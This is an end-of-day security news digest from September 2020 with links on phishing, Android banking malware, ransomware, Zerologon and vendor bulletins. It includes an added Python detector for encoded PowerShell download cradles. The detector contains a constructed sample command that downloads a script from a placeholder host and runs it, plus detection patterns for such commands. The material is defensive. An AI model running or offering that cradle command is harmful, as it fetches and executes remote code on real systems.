End-of-Day report
Timeframe: Wednesday 23-09-2020 18:00 - Thursday 24-09-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
News
Security checklist: passwords & accounts
Passwords are a necessary evil. The following tips keep password stress to a minimum without cutting corners on security.
https://heise.de/-4886755
Beware of Raiffeisen phishing SMS
Fraudulent phishing SMS messages in the name of Raiffeisen Bank are currently being sent out en masse. They claim that a pushTAN registration needs to be completed. The linked website looks confusingly similar to the real one. Warning: under no circumstances enter your online banking credentials there; they go straight into the hands of criminals.
https://www.watchlist-internet.at/news/vorsicht-vor-raiffeisen-phishing-sms/
Android malware Alien steals money
An Android trojan called Alien has been active since the beginning of the year and is offered as malware-as-a-service (MaaS) on underground hacker forums. It targets banking and finance apps, including in Germany.
https://www.zdnet.de/88382932/android-malware-alien-stiehlt-geld/
Supply chain offers points of attack
Attackers are increasingly using the supply chains in companies' ecosystems to carry out their attacks. Smaller suppliers with weak security structures offer entry points for attacks.
https://www.zdnet.de/88382938/supply-chain-bietet-angriffspunkte/
Protecting Against PowerShell Attacks: 5 Key Steps
Admins are already busy maintaining all systems running onsite and remotely, so the extra demand to protect against fileless threats can be overwhelming for manual security operations and inexperienced IT professionals. There are, however, five basic steps you can take to help mitigate the threat.
https://www.beyondtrust.com/blog/entry/protecting-against-powershell-attacks-is-easier-than-you-think
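The post is a teaser and does not list its five steps. As an added example (not code from BeyondTrust or the original report), the block below shows detection logic for the fileless pattern that article is concerned with: PowerShell launched with an encoded command that downloads and evaluates a next stage. The sample command lines, the accepted flag prefixes and the indicator names are constructed assumptions for illustration, not real telemetry.

```python
"""Added example (not from the BeyondTrust post): decode PowerShell -EncodedCommand
payloads in process command lines and flag fileless download cradles.
All sample command lines below are constructed for illustration."""
import base64
import re

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; -e, -ec, -en and
# -enc are the ones commonly seen (assumption: this list is what we match on).
# Requiring whitespace right after the flag keeps -ExecutionPolicy and the -eq
# operator from matching.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Indicators checked against the raw command line plus the decoded script.
CRADLE_PATTERNS = {
    "download": re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|BitsTransfer"),
    "invoke-expression": re.compile(r"(?i)Invoke-Expression|\biex\b"),
    "nested-encoding": re.compile(r"(?i)FromBase64String|GzipStream|Decompress"),
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b"),
}


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Flag present but the payload is not valid PowerShell encoding; this
        # function only reports what it could actually decode.
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Classify one process-creation command line."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = sorted(name for name, pat in CRADLE_PATTERNS.items() if pat.search(haystack))
    # An encoded command that downloads or evals is the classic cradle; two or more
    # indicators without encoding is still worth an alert.
    suspicious = (decoded is not None and bool({"download", "invoke-expression"} & set(hits))) or len(hits) >= 2
    return {"encoded": decoded is not None, "decoded": decoded, "indicators": hits, "suspicious": suspicious}


# Constructed samples: one download cradle, one legitimate script run, one ad-hoc query.
CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoP -W Hidden -enc " + encode_command(CRADLE),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    'powershell.exe -Command "Get-Service | Where-Object Status -eq Running"',
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = analyze_command_line(line)
        print(("ALERT " if result["suspicious"] else "ok    ") + line[:60])
        if result["decoded"]:
            print("   decoded:", result["decoded"])
        if result["indicators"]:
            print("   indicators:", ", ".join(result["indicators"]))
```

Feed it the command-line field of process-creation events (Sysmon event 1 or Windows event 4688 with command-line auditing enabled); because the decoded script is scanned as well, an attacker gains nothing from encoding alone, and the `-ExecutionPolicy Bypass` line shows why a bare keyword match on "Bypass" would be too noisy.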
AgeLocker ransomware targets QNAP NAS devices, steals data
QNAP NAS devices are being targeted in attacks by the AgeLocker ransomware, which encrypts the device's data and, in some cases, steals files from the victim.
https://www.bleepingcomputer.com/news/security/agelocker-ransomware-targets-qnap-nas-devices-steals-data/
Malicious One-Liner Using Hastebin
Short scripts that deliver malware to a website are nothing new, but during a recent investigation we found a script using hastebin[.]com, which is a domain we see used infrequently. The script was found writing malicious contents into an image directory on a compromised website, allowing an attacker to execute other malicious commands.
https://blog.sucuri.net/2020/09/malicious-one-liner-using-hastebin.html
[SANS ISC] Party in Ibiza with PowerShell
I published the following diary on isc.sans.edu: "Party in Ibiza with PowerShell": Today, I would like to talk about PowerShell ISE or "Integration Scripting Environment". This tool is installed by default on all Windows computers (besides the classic PowerShell interpreter). From a malware analysis point of view, ISE offers a key feature: [...]
https://blog.rootshell.be/2020/09/24/sans-isc-party-in-ibiza-with-powershell/
Fuzzing Image Parsing in Windows, Part One: Color Profiles
Image parsing and rendering are basic features of any modern operating system (OS). Image parsing is an easily accessible attack surface, and a vulnerability that may lead to remote code execution or information disclosure in such a feature is valuable to attackers.
https://www.fireeye.com/blog/threat-research/2020/09/fuzzing-image-parsing-in-windows-color-profiles.html
Vulnerabilities
Patch now! Attacks on the Zerologon vulnerability in Windows Server
Microsoft warns of attacks on a critical security vulnerability in various Windows Server versions. Samba is also affected.
https://heise.de/-4910854
Security updates for Thursday
Security updates have been issued by Fedora (firefox, libproxy, mbedtls, samba, and zeromq), openSUSE (chromium and virtualbox), Red Hat (firefox and kernel), SUSE (cifs-utils, conmon, fuse-overlayfs, libcontainers-common, podman, libcdio, python-pip, samba, and wavpack), and Ubuntu (rdflib).
https://lwn.net/Articles/832405/
Synology-SA-20:22 SRM
A vulnerability allows remote authenticated users to bypass security constraints via a susceptible version of Synology Router Manager (SRM).
https://www.synology.com/en-global/support/security/Synology_SA_20_22
Wireshark: Multiple vulnerabilities allow denial of service
http://www.cert-bund.de/advisoryshort/CB-K20-0922
Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230)
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-apache-struts-affect-tivoli-netcool-omnibus-webgui-cve-2019-0233-cve-2019-0230/
Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulnerability-from-kernel-affects-ibm-netezza-host-management-10/
Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Spectrum Conductor and IBM Spectrum Conductor with Spark
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-runtime-affect-ibm-spectrum-conductor-and-ibm-spectrum-conductor-with-spark-3/
Security Bulletin: Multiple Vulnerabilities Have Been Identified In IBM Security Verify Privilege Manager previously known as IBM Security Privilege Manager
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-ibm-security-verify-privilege-manager-previously-known-as-ibm-security-privilege-manager/
Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulnerabilities-from-kernel-affect-ibm-netezza-host-management-7/
Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulnerability-from-kernel-affects-ibm-netezza-host-management-9/
Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulnerabilities-from-kernel-affect-ibm-netezza-host-management-6/
Security Bulletin: Multiple Vulnerabilities Have Been Identified In IBM Security Verify Privilege Vault previously known as IBM Security Secret Server
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-ibm-security-verify-privilege-vault-previously-known-as-ibm-security-secret-server/
Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulnerability-from-kernel-affects-ibm-netezza-host-management-8/
Security Bulletin: Multiple vulnerabilities affect IBM Tivoli Monitoring embedded WebSphere Application and IHS server
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affect-ibm-tivoli-monitoring-embedded-websphere-application-and-ihs-server-2/